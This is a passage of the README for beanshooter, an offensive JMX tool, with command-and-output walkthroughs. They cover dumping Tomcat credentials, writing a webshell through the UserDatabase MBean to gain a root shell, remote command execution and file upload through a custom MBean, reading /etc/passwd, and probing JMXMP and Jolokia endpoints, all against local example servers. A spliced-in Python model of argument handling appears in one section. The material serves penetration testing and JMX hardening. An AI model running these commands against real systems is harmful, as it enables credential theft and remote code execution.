[qtc@devbox ~]$ beanshooter recorder stop 172.17.0.2 1090 1
[+] Recording with ID 1 stopped successfully.

Recorder Save

After a recording was stopped, it can be saved using the save action. In contrast to the dump action, this saves the recording on the local machine instead of the application server.

[qtc@devbox ~]$ beanshooter recorder save 172.17.0.2 1090 1 recording.dat
[+] Saving recording with ID: 1
[+] Writing recording data to: /home/qtc/recording.dat

Tomcat

The tomcat action interacts with the MemoryUserDatabaseMBean of Apache Tomcat. This MBean provides access to the user accounts available on the Tomcat service.

Tomcat Dump

The dump action dumps the usernames and passwords available on the Tomcat server into a local file. When invoked with a single argument, credentials are dumped in the format <username>:<password>:

[qtc@devbox ~]$ beanshooter tomcat dump 172.17.0.2 1090 creds.txt
[+] Dumping credentials...
[+] Users dumped to /home/qtc/creds.txt
[qtc@devbox ~]$ cat creds.txt
manager:P@55w0rD#
admin:s3cr3T!$
status:cr@cKM3o.O

When invoked with two arguments, usernames are stored in the first specified location and passwords in the second:

[qtc@devbox ~]$ beanshooter tomcat dump 172.17.0.2 1090 users.txt passwords.txt
[+] Dumping credentials...
[+] Users dumped to /home/qtc/users.txt
[+] Passwords dumped to /home/qtc/passwords.txt

Tomcat List

The list action lists the available user accounts together with their associated roles and credentials:

[qtc@devbox ~]$ beanshooter tomcat list 172.17.0.2 1090
[+] Listing tomcat users:
[+]
[+]     ----------------------------------------
[+]     Username:  manager
[+]     Password:  P@55w0rD#
[+]     Roles:
[+]            Users:type=Role,rolename="manager-gui",database=UserDatabase
[+]            Users:type=Role,rolename="manager-script",database=UserDatabase
[+]            Users:type=Role,rolename="manager-jmx",database=UserDatabase
[+]            Users:type=Role,rolename="manager-status",database=UserDatabase
[+]
[+]     ----------------------------------------
[+]     Username:  admin
[+]     Password:  s3cr3T!$
[+]     Roles:
[+]            Users:type=Role,rolename="admin-gui",database=UserDatabase
[+]            Users:type=Role,rolename="admin-script",database=UserDatabase
[+]
[+]     ----------------------------------------
[+]     Username:  status
[+]     Password:  cr@cKM3o.O
[+]     Roles:
[+]            Users:type=Role,rolename="manager-status",database=UserDatabase

Tomcat Write

The write action writes a partially controlled file to an arbitrary location on the application server. This action can be used to reliably deploy a webshell on a Tomcat service:

[qtc@devbox ~]$ beanshooter tomcat write 172.17.0.2 1090 /opt/webshell-cli/webshells/webshell.jsp /usr/local/tomcat/webapps/ROOT/shell.jsp
[+] Writing local file /opt/webshell-cli/webshells/webshell.jsp to server location /usr/local/tomcat/webapps/ROOT/shell.jsp
[+]     Current user database is at conf/tomcat-users.xml
[+]     Current user database is readonly
[+]     Adjusting readonly property to make it writable.
[+]     Changing database path to /usr/local/tomcat/webapps/ROOT/shell.jsp
[+]     Creating new role containing the local file content.
[+]     Saving modified user database.
[+]     Restoring readonly property.
[+]     Restoring pathname property.
[+] All done.
[qtc@devbox ~]$ webshell-cli http://172.17.0.2:8080/shell.jsp
[root@d475fdb21692 /usr/local/tomcat]$ id
uid=0(root) gid=0(root) groups=0(root)

The write action abuses a coding error in Apache Tomcat's UserDatabase MBean. We reported the bug, but it was not considered a security vulnerability. To write to an arbitrary location, beanshooter needs to change the location of the UserDatabase. After the desired file was written, all changes are reverted, but be careful in production environments anyway.

Tonka

The TonkaBean is a custom MBean implemented by the beanshooter project that allows file system access and command execution on the JMX server. Its operations can be accessed by using the tonka operation followed by the desired action.

Tonka Exec

The exec action can be used to invoke a single command on the JMX service:

[qtc@devbox ~]$ beanshooter tonka exec 172.17.0.2 9010 id
[+] Invoking the executeCommand method with argument: id
[+] The call was successful
[+]
[+] Server response:
uid=0(root) gid=0(root) groups=0(root)

The last argument of the exec action should be a string. When the --shell option is not used, this string is split on whitespace (quote-aware) and passed as an array to the ProcessBuilder class on the server side.

If --shell is used, the specified shell string is split on whitespace and the resulting array is concatenated with the specified argument string before being passed to the ProcessBuilder class. This allows shell-like execution where shell special characters are interpreted correctly:

[qtc@devbox ~]$ beanshooter tonka exec 172.17.0.2 9010 --shell 'ash -c' 'echo $HOSTNAME'
[+] Invoking the executeCommand method with argument: ash -c echo $HOSTNAME
[+] The call was successful
[+]
[+] Server response:
fee2d783023b

For convenience, common shells are automatically suffixed with the argument required to take a command string. Therefore, --shell ash is automatically translated to --shell 'ash -c'.

Tonka Execarray

The execarray action is very similar to the exec action, but instead of expecting a single string as argument and splitting it on whitespace to construct the command array, the execarray action allows to specify multiple arguments that are used directly as the command array for the ProcessBuilder class:

[qtc@devbox ~]$ beanshooter tonka execarray 172.17.0.2 9010 -- ash -c 'echo $HOME'
[+] Invoking the executeCommand method with argument: ash -c echo $HOME
[+] The call was successful
[+]
[+] Server response:
/root
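The argument handling of exec and execarray described above determines whether a string like `$HOSTNAME` reaches ProcessBuilder as a literal word or is interpreted by a shell, which is what the two "Invoking the executeCommand method" log lines illustrate. The following Python model of that handling is an added example, not beanshooter's code: shlex.split stands in for the quote-aware split, and the set of shells that get the -c suffix is an assumption (beanshooter's real list may differ).

```python
import shlex
from typing import List, Optional

# Assumed set of "common shells" that are completed with "-c" automatically;
# the page only documents ash, the others are an assumption.
SHELL_SUFFIX = {"sh": "-c", "ash": "-c", "bash": "-c", "dash": "-c", "zsh": "-c"}


def normalize_shell(shell: str) -> List[str]:
    """Split the --shell value on whitespace and add the command-string flag if missing."""
    parts = shlex.split(shell)
    if len(parts) == 1 and parts[0] in SHELL_SUFFIX:
        return [parts[0], SHELL_SUFFIX[parts[0]]]
    return parts


def exec_command_array(argument: str, shell: Optional[str] = None) -> List[str]:
    """Command array the exec action hands to ProcessBuilder (as documented above).

    Without --shell the argument string itself is split (quote-aware); with --shell
    the split shell prefix is concatenated with the unsplit argument string.
    """
    if shell is None:
        return shlex.split(argument)
    return normalize_shell(shell) + [argument]


def execarray_command_array(arguments: List[str]) -> List[str]:
    """The execarray action uses its arguments directly as the command array."""
    return list(arguments)


def shell_interprets_argument(array: List[str]) -> bool:
    """True when the first elements are a shell plus -c, so metacharacters in the
    command string (e.g. $HOSTNAME or pipes) are expanded server-side."""
    return len(array) >= 3 and array[0] in SHELL_SUFFIX and array[1] == SHELL_SUFFIX[array[0]]


def log_line(array: List[str]) -> str:
    """Reproduce the 'Invoking the executeCommand method with argument:' display."""
    return "Invoking the executeCommand method with argument: " + " ".join(array)


if __name__ == "__main__":
    for arr in (exec_command_array("echo $HOSTNAME"),
                exec_command_array("echo $HOSTNAME", shell="ash"),
                execarray_command_array(["ash", "-c", "echo $HOME"])):
        print(log_line(arr), "| shell interprets:", shell_interprets_argument(arr))
```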

Tonka Shell

The shell action spawns a command shell in which you can specify commands to execute on the JMX server. The shell is not fully interactive and is just a wrapper around the Java Runtime.exec method. However, basic support for environment variables and the current working directory is implemented:

[qtc@devbox ~]$ beanshooter tonka shell 172.17.0.2 9010
[root@172.17.0.2 /]$ id
uid=0(root) gid=0(root) groups=0(root)
[root@172.17.0.2 /]$ cd /home
[root@172.17.0.2 /home]$ !env test=example
[root@172.17.0.2 /home]$ echo $test
example

The example above demonstrates how environment variables can be set using the !env keyword. Apart from this keyword, several others are available:

[qtc@devbox ~]$ beanshooter tonka shell 172.17.0.2 9010
[root@172.17.0.2 /]$ !help
Available shell commands:
  <cmd>                        execute the specified command
  cd <dir>                     change working directory on the server
  exit|quit                    exit the shell
  !help|!h                     print this help menu
  !environ|!env <key>=<value>  set new environment variables in key=value format
  !upload|!put <src> <dst>     upload a file to the remote MBeanServer
  !download|!get <src> <dst>   download a file from the remote MBeanServer
  !background|!back <cmd>      executes the specified command in the background

Tonka Upload

The upload action can be used to upload files to the JMX server:

[qtc@devbox ~]$ beanshooter tonka upload 172.17.0.2 9010 file.dat /tmp
[+] Uploading local file /home/qtc/file.dat to path /tmp on the MBeanSerer.
[+] 33 bytes were written to /tmp/file.dat

Tonka Download

The download action can be used to download files from the JMX server:

[qtc@devbox ~]$ beanshooter tonka download 172.17.0.2 9010 /etc/passwd
[+] Saving remote file /etc/passwd to local path /home/qtc/passwd
[+] 1172 bytes were written to /home/qtc/passwd

JMXMP

JMX services can use different connector types. The most commonly used connector today is Java RMI, which provides access to JMX over the Java RMI protocol. Another popular connector is the JMX Messaging Protocol (JMXMP), which is outdated but still encountered frequently. beanshooter has built-in JMXMP support and attempts to connect via JMXMP when the --jmxmp option is used:

[qtc@devbox ~]$ beanshooter enum 172.17.0.2 4444 --jmxmp
[+] Checking servers SASL configuration:
[+]
[+]     - Remote JMXMP server does not use SASL.
[+]       Login is possible without specifying credentials.
[+]       Vulnerability Status: Vulnerable
[+]
[+] Checking pre-auth deserialization behavior:
[+]
[+]     - JMXMP serial check is work in progress but endpoints are usually vulnerable.
[+]       Configuration Status: Undecided
[+]
[+] Checking available MBeans:
[+]
[+]     - 22 MBeans are currently registred on the MBean server.
[+]       Found 0 non default MBeans.

Authenticated JMXMP endpoints are usually protected using SASL. With SASL enabled, the JMX endpoint usually requires the client to connect with a specific SASL profile. The profiles available in beanshooter are:

  • plain
  • digest
  • cram
  • ntlm
  • gssapi

Each of them can optionally be paired with TLS by using the --ssl option. When using the enum action on a SASL-protected JMXMP endpoint, beanshooter attempts to enumerate the required SASL profile. While the required SASL mechanism can usually be determined, the required TLS setting cannot be enumerated:

[qtc@devbox ~]$ beanshooter enum 172.17.0.2 4449 --jmxmp
[+] Checking servers SASL configuration:
[+]
[+]     - Remote JMXMP server uses SASL/NTLM SASL profile.
[+]       Notice: TLS setting cannot be enumerated and --ssl may be required.
[+]       Vulnerability Status: Non Vulnerable
[+]
[+] Checking pre-auth deserialization behavior:
[+]
[+]     - JMXMP serial check is work in progress but endpoints are usually vulnerable.
[+]       Configuration Status: Undecided

Jolokia Support

Since v4.0.0, beanshooter supports Jolokia-based JMX endpoints. Establishing a connection to a Jolokia-based endpoint requires the usual target format and the --jolokia flag:

[qtc@devbox ~]$ beanshooter enum 172.17.0.2 8080 --jolokia --username manager --password admin
[+] Checking specified credentials:
[+]
[+]     - Login successful! The specified credentials are correct.
[+]       Username: manager  - Password: admin
[+]
[+] Checking Jolokia Version:
[+]
[+]     - Agent Version 1.7.1 - Protocol Version: 7.2
[+]       Vulnerability Status: Non Vulnerable
[+]
[+] Checking whether Jolokia Proxy Mode is enabled:
[+]
[+]     - Jolokia Proxy Mode is enabled! You may connect to backend JMX services.
[+]       Vulnerability Status: Vulnerable
[+]
[+] Checking available MBeans:
[+]
[+]     - 75 MBeans are currently registred on the MBean server.
[+]       Listing 56 non default MBeans:
...

Due to Jolokia's limited feature set, not all beanshooter operations are supported. If you run into problems, consult the Jolokia FAQ. To play around with Jolokia, beanshooter provides an example server that exposes a Jolokia endpoint on port 8080. Additionally, a regular RMI-based JMX endpoint can be found on port 1090.

Docker Image

Since version v3.1.1, beanshooter is also available as a docker image and can be pulled from the GitHub container registry. For each release, a regular and a slim version are available. Both provide a fully working version of beanshooter, but only the regular version ships with ysoserial, resulting in a larger image size:

  • docker pull ghcr.io/qtc-de/beanshooter/beanshooter:3.1.1 (121MB)
  • docker pull ghcr.io/qtc-de/beanshooter/beanshooter:3.1.1-slim (61.9MB)

You can also build the container yourself by running the following commands:

[user@host ~]$ git clone https://github.com/qtc-de/beanshooter
[user@host ~]$ cd beanshooter && docker build -t beanshooter .

Example Servers

Most of the examples shown above are based on the jmx-example-server and the tomcat-example-server. These servers are contained in the docker folder of the repository and can be used to practice JMX enumeration. You can build the corresponding containers yourself or pull them directly from the GitHub Container Registry.

Copyright 2023, Tobias Neitzel and the beanshooter contributors.

Tags: tool sharing, java security